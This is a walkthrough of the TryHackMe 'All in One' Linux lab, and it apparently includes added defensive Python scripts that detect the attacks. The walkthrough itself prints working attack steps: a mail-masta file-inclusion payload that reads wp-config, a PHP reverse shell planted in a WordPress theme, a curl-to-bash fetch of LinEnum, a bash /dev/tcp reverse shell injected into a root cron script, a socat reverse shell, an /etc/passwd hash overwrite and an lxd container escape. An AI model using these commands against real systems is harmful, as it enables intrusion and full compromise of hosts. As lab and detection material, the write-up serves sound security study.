All in One is an easy Linux box on TryHackMe.
Enumeration
Starting off with an nmap scan, I find ports 21, 22 and 80 open.
root@kali:~/tryhackme/allinone# nmap -sC -sV 10.10.166.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)
Nmap scan report for 10.10.166.147
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.2.8.75
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
FTP Enumeration
Since FTP allows anonymous access, I log in and start to poke around.
root@kali:~/tryhackme/allinone# ftp 10.10.166.147
Connected to 10.10.166.147.
220 (vsFTPd 3.0.3)
Name (10.10.166.147:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 ..
226 Directory send OK.
Nothing is located here, so I try to upload a file; however, I am not allowed to do that.
ftp> put new
local: new remote: new
200 PORT command successful. Consider using PASV.
553 Could not create file.
HTTP Enumeration
Moving on to port 80, I run gobuster to look for any directories. Here I find /wordpress.
root@kali:~/tryhackme/allinone# gobuster dir -u 10.10.166.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.166.147
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html
[+] Timeout:        10s
===============================================================
2020/12/09 15:39:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)
Since /wordpress is open, I can run wpscan to gather more information.
root@kali:~/tryhackme/allinone# wpscan --url 10.10.166.147/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://10.10.166.147/wordpress/
[+] Started: Wed Dec  9 16:54:36 2020

Interesting Finding(s):

[+] http://10.10.166.147/wordpress/
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://10.10.166.147/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.166.147/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.166.147/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://10.10.166.147/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.166.147/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.166.147/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/
 | Latest Version: 1.5 (up to date)
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/readme.txt
 | Style URL: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2019-05-10T16:05:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <==========================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Dec  9 16:54:52 2020
Exploit
Mail-Masta Exploit
Since wpscan found a few plugins, I start looking for exploits for them. Looking at mail-masta, I find one on exploit-db.
Looking through this exploit, I find that /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd is a working local file inclusion, as I can view the file in the response.
Since this is working properly, I need to find a file to read that will give me useful information. I find a Medium article detailing how to extract the wp-config file by having PHP base64-encode it first. To do this, I just need to change the link to /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
This outputs a large base64 value. I take this value and put it in a file named wp-config, then decode it to properly read the file.
root@kali:~/tryhackme/allinone# cat wp-config | base64 -d
.......................................................
/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', '*******************' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
.......................................................
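From the defender's side, the two reads above leave a clear trace in the web server's access log. The following is an added example, not code from the original write-up: it parses Apache combined-log lines and flags requests to the mail-masta count_of_send.php endpoint whose pl parameter carries a stream wrapper such as php://filter, a traversal sequence, or an absolute system path. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined-log prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)
# Stream wrappers and path shapes that never belong in a file-include parameter.
WRAPPER_RE = re.compile(r'^(php|data|expect|file|phar|zip|glob)://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%2e%2e)', re.IGNORECASE)
TARGET_SUFFIX = "/mail-masta/inc/campaign/count_of_send.php"

def classify_pl(value):
    """Return why a 'pl' value looks like an include attack, or None if it looks benign."""
    decoded = unquote(unquote(value))  # parse_qs decoded once; undo double-encoding too
    if WRAPPER_RE.match(decoded):
        return "stream-wrapper"
    if TRAVERSAL_RE.search(decoded):
        return "path-traversal"
    if decoded.startswith("/"):
        return "absolute-path"
    return None

def scan_access_log(lines):
    """Return (client, url, reason) for requests abusing count_of_send.php?pl=."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = m.group("url")
        parts = urlsplit(url)
        if not parts.path.endswith(TARGET_SUFFIX):
            continue
        for value in parse_qs(parts.query).get("pl", []):
            reason = classify_pl(value)
            if reason:
                findings.append((m.group("ip"), url, reason))
    return findings

# Constructed sample lines (not real traffic): the two reads made above,
# a double-encoded traversal, and one harmless request.
SAMPLE_LOG = [
    '10.2.8.75 - - [09/Dec/2020:17:02:11 -0500] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1672',
    '10.2.8.75 - - [09/Dec/2020:17:04:30 -0500] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 4210',
    '10.2.8.75 - - [09/Dec/2020:17:05:02 -0500] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=%252e%252e%252fwp-config.php HTTP/1.1" 200 3000',
    '10.2.8.75 - - [09/Dec/2020:17:06:00 -0500] "GET /wordpress/index.php/feed/ HTTP/1.1" 200 5120',
]
```

Run scan_access_log over a real access log (one line per list element) to get the offending client, URL and the reason each request was flagged.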
WordPress Reverse Shell
With this password, I can log in to the WordPress site. Once logged in, I navigate to Appearance > Theme Editor, select 404 Template (404.php) and replace its contents with a PHP reverse shell. If you wish to read up more on how to gain a reverse shell on WordPress, I recommend checking out this article by Hacking Articles.
Once I finish editing this file, I save it and set up a netcat listener. With the listener running, I navigate to /wp-content/themes/twentytwenty/404.php to gain a reverse shell.
root@kali:~/tryhackme/allinone# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 59480
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:59:22 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Privilege Escalation as www-data
Before running any scans, I upgrade the shell to a proper TTY using python3.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.4$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/allinone# stty raw -echo
root@kali:~/tryhackme/allinone# fg
bash-4.4$
I then run LinEnum.sh and find several ways to escalate my privileges straight to root
bash-4.4$ curl 10.2.8.75/LinEnum.sh | bash
SUID
Looking at the SUID section of LinEnum, it immediately points out 3 known vulnerable SUID files. I will be using gtfobins to exploit these
Starting off with bash, I look on GTFOBins to find the correct syntax to exploit it.
bash-4.4$ bash -p
bash-4.4#
Looking at chmod on GTFOBins, I find that it will not drop me a shell, but it does allow me to edit the permissions on any file. You could change the permissions on root.txt and user.txt to be able to read them, but I want to gain root access. Instead, I make /etc/passwd writable so I can insert my own password hash.
bash-4.4# chmod 0777 /etc/passwd
bash-4.4# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1672 Oct  6 11:57 /etc/passwd
I need to generate a password hash using openssl to insert into the /etc/passwd file.
root@kali:~/tryhackme/allinone# openssl passwd -1 -salt root password
$1$root$1fvaXuILgb4rdRlHdQ80N/
Now edit the file and replace the x next to root with the new hash.
bash-4.4$ vi /etc/passwd
root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash
After saving this, I can log in as root with the password password.
bash-4.4$ su root
Password:
root@elyana:/#
Cronjob
Looking at the cronjobs, I find that root is running one out of /var/backups/script.sh
Navigating there, I see I am allowed to edit the file
bash-4.4$ ls -la
total 52
drwxr-xr-x  2 root root  4096 Oct  7 13:41 .
drwxr-xr-x 14 root root  4096 Oct  5 19:43 ..
-rw-r--r--  1 root root 32890 Oct  6 11:57 apt.extended_states.0
-rw-r--r--  1 root root  3570 Oct  5 21:07 apt.extended_states.1.gz
-rwxrwxrwx  1 root root    73 Oct  7 13:37 script.sh
Since I am allowed to edit the file, I insert a bash reverse shell from Pentest Monkey
echo '#!/bin/bash' > script.sh
echo 'bash -i >& /dev/tcp/10.9.2.255/9002 0>&1' >> script.sh
With this edited, I set up a netcat listener and wait a few moments. I then receive a connection and a root shell.
root@kali:~/tryhackme/allinone# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 58036
bash: cannot set terminal process group (19460): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~#
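Both escalations above come down to file permissions: a world-writable /etc/passwd that accepts a hash directly in the password field, and a world-writable script executed by root's cron. The following is an added audit helper, not part of the original write-up, that checks for exactly those conditions; the passwd text is a constructed sample mirroring the edit made above.

```python
import os
import stat

# Values in the passwd password field that defer to /etc/shadow or lock the account.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return (lineno, user, problem) for passwd-format text (constructed or real)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash here is honoured directly, bypassing /etc/shadow, as shown above.
            findings.append((lineno, name, "password hash stored in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "extra uid 0 account"))
    return findings

def world_writable(path):
    """True when others may write 'path' (the state of /etc/passwd and script.sh above)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def world_writable_files(paths):
    """Return the existing regular files among 'paths' that any local user could rewrite."""
    return [p for p in paths if os.path.isfile(p) and world_writable(p)]

# Constructed sample: root carries the hash inserted above, plus a second uid-0 user.
SAMPLE_PASSWD = "\n".join([
    "root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "elyana:x:1000:1000:elyana:/home/elyana:/bin/bash",
    "toor:x:0:0::/root:/bin/bash",
])

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
    # On a live host, point the same check at the real files and at every cron script.
    for p in world_writable_files(["/etc/passwd", "/var/backups/script.sh"]):
        print("world-writable:", p)
```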
Elevating to elyana
Moving backwards, I will work as www-data and try to elevate to elyana.
Reading the hint.txt file on elyana's Desktop, I find that the password for this user is stored somewhere on the system.
bash-4.4$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)
I start looking around for anything that is useful. Under /etc/ I find an interesting result. This looks promising, so I read the file and find credentials.
bash-4.4$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: *********
Another way of finding this file is to run linpeas.
Testing this password, I can log in as elyana.
bash-4.4$ su elyana
Password:
bash-4.4$ whoami
elyana
Privilege Escalation as elyana
Like www-data, there are several ways to elevate to root as elyana. I will outline a few methods here. I rerun LinEnum.sh to help find results
Sudo
The first thing I do is run sudo -l to see if I am allowed to run any commands with sudo. Here, I find I can run socat.
bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat
Looking on GTFOBins, I see an easy way to escalate to root. Running this command gives me root access.
bash-4.4$ sudo socat stdin exec:/bin/sh
whoami
root
Alternatively, use the following and catch the connection with a netcat listener:
sudo socat tcp-connect:10.9.2.255:9001 exec:bash,pty,stderr,setsid,sigint,sane
lxd
Looking at LinEnum, I find that elyana is a member of the lxd group.
This is a well-known privilege escalation path and I will be following this guide to do so.
First, I download the alpine builder and build it on my local machine.
root@kali:~/tryhackme/allinone# git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (31/31), done.
root@kali:~/tryhackme/allinone# cd lxd-alpine-builder/
root@kali:~/tryhackme/allinone/lxd-alpine-builder# ./build-alpine
Determining the latest release... v3.12
..................................................................................
OK: 8 MiB in 19 packages
Once this is done building, I upload it to the machine and import it
bash-4.4$ wget 10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
--2020-12-10 02:23:07--  http://10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199386 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.05M   321KB/s    in 16s

2020-12-10 02:23:24 (190 KB/s) - ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ saved [3199386/3199386]

bash-4.4$ lxc image import ./alpine-v3.12-x86_64-20201209_2120.tar.gz --alias myimage
I want to double check it has been created properly
bash-4.4$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | fa664dd4e321 | no     | alpine v3.12 (20201209_21:20) | x86_64 | 3.05MB | Dec 10, 2020 at 2:23am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
The image was created properly, so I can now create a privileged container from it, mount the host's root filesystem inside it and exec a shell to gain root access.
bash-4.4$ lxc init myimage ignite -c security.privileged=true
Creating ignite
bash-4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
bash-4.4$ lxc start ignite
bash-4.4$ lxc exec ignite /bin/sh
~ # whoami
root
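The Sudo and lxd sections above both hinge on a single line of configuration: a NOPASSWD rule in sudoers, and a line in /etc/group listing the user in lxd. As an added audit helper (not code from the original write-up), the following parses sudo -l output and /etc/group text to report both conditions; docker is included alongside lxd because membership grants the same host-level access. The inputs are constructed for the example, modelled on the output shown above.

```python
import re

# One sudoers rule as `sudo -l` prints it: "(runas) TAG: TAG: cmd1, cmd2".
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')
# Groups whose members can reach the host as root through the daemon they control.
HOST_EQUIV_GROUPS = {"lxd", "docker"}

def parse_sudo_l(output):
    """Return [(runas, nopasswd, command)] for every rule listed by `sudo -l`."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules

def nopasswd_rules(output):
    """Only the rules that need no password, the ones to review first."""
    return [r for r in parse_sudo_l(output) if r[1]]

def risky_groups(user, group_text):
    """Names of host-equivalent groups in /etc/group text that list 'user' as a member."""
    found = []
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) != 4:
            continue
        members = [m for m in fields[3].split(",") if m]
        if fields[0] in HOST_EQUIV_GROUPS and user in members:
            found.append(fields[0])
    return found

# Constructed inputs modelled on the sudo -l output and group membership found above.
SAMPLE_SUDO_L = r"""Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat
"""
SAMPLE_GROUP = "sudo:x:27:\nlxd:x:108:elyana\nelyana:x:1000:\n"
```

On a live host, feed it the real output of sudo -l and the contents of /etc/group; any NOPASSWD rule or lxd/docker membership it reports deserves a review of whether the user genuinely needs it.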
Finally, user.txt and root.txt are base64-encoded; go ahead and decode them, then submit your flags 🚩🚩!
This was a fun box, to be honest, and it covers some of the most important ways of exploiting a system.